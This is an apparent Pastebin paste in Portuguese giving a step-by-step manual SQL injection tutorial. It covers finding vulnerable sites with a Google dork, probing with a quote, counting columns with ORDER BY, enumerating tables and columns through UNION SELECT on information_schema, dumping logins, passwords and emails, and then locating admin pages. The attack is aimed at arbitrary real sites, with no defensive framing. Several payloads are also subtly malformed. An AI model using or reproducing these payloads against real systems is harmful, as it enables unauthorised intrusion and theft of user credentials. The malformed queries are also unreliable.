Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Sqli(Sql Injection) é uma vulnerabilidade que faz com que o invasor possa fazer a injeção de
- um código para uma aplicação que tenha o banco de dados Sql.
- Para Explorar o Sql injection manualmente deveremos pegar algum site
- vulnerável a essa injeção!
- para pegarmos esse site vulnerável iremos usar o Google hacking,
- e com uma dork iremos achar sites com algum url parameter
- usando a dork "inurl:.php?id" sendo o parametro id, iremos testar para ver
- se o site contem essa falha.
- 1° http://www.example.com.br/noticiaphp?id=143 para checar se tem essa vulnerabilidade vamos colocar um ' depois do id(parametro)
- ttp://www.example.com.br/noticiaphp?id=143'
- 2° Existem Vários erros relacionados ao SQLi irei listar alguns aqui em baixo:
- "SQL syntax.*MySQL"
- "Warning.*mysql_.*"
- "valid MySQL result"
- "MySqlClient\."
- Erro MySQL: You have an error in your SQL syntax;
- check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
- depois de ter checado essa url parameter, vamos usar um comando que irá checar a quantidade de tabelas existentes que seria
- o *ORDER BY* ou *GROUP BY*
- iremos testar tabela por tabela:
- http://www.example.com.br/noticia.php?id=143 order by 1-- (NÃO TEM ERRO)
- http://www.example.com.br/noticia.php?id=143 order by 2-- (NÃO TEM ERRO)
- http://www.example.com.br/noticia.php?id=143 order by 3-- (NÃO TEM ERRO)
- http://www.example.com.br/noticia.php?id=143 order by 4-- (NÃO TEM ERRO)
- http://www.example.com.br/noticia.php?id=143 order by 5-- (NÃO TEM ERRO)
- http://www.example.com.br/noticia.php?id=143 order by 6-- (CONTÉM ERRO)
- Isso Significa que teremos 5 tabelas para explorar...
- Agora iremos Unir todas essas tabelas usando o comando *UNION ALL SELECT* citando a quantidade de tabelas 1 por 1 e colocando o id com um - no começo:
- http://www.example.com.br/noticiaphp?id=-143 union all select 1,2,3,4,5
- depois de ter unido todas as tabelas vamos lista-las usando um comando em algumas tabelas,
- veja um exemplo abaixo:
- http://www.example.com.br/noticia.php?id=-143 union all select 1,group_concat(table_name),3 from information_schema.table s where table_schema =database(),4,5--
- depois de você ter feito esse comando você irá notar que irá aparecer as tabelas no site
- suponhamos que seja: Adm, Users, Noticias
- agora você irá explorar a tabela de seu interesse, eu irei explorar a tabela Users como exemplo para achar agora as colunas
- e para nós "explorarmos" iremos usar o seguinte comando:
- http://www.example.com.br/noticia.php?id=-143 union all select 1,group_concat(column_name),3 from information_schema.colum ns where table_name='Users'4,5--
- depois de ter executado esse comando irá aparecer o nome das tabelas que estão na tabela Users, exemplo:
- login,senha,email,id
- Depois com o nome da tabela na mão e as colunas iremos dar um "dump" nos items da coluna, sendo o comando *CONCAT*, exemplo:
- http://www.example.com.br/noticia.php?id=-143 union all select 1,concat(login,0x3a,senha,0x3a,email),3 from Users,4,5--
- Entendendo o comando acima:
- login,senha e email são a coluna
- Users é a tabela
- e o 0x3a = ":"
- concat irá pegar os items das colunas: login,senha,email na Tabela Users
- e agora terminando de explorar irá aparecer no site os itens da tabela, exemplo:
- admin:admin:admin@gmail.com
- usercomun:0102:carinha@gmail.com
- depois disso usaremos alguns scripts como uniscan, admin page finder para achar sua página administrativa!!
- Isso foi uma pequena explicação de como explorar a falha Sqli Manualmente usando um parameter url
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement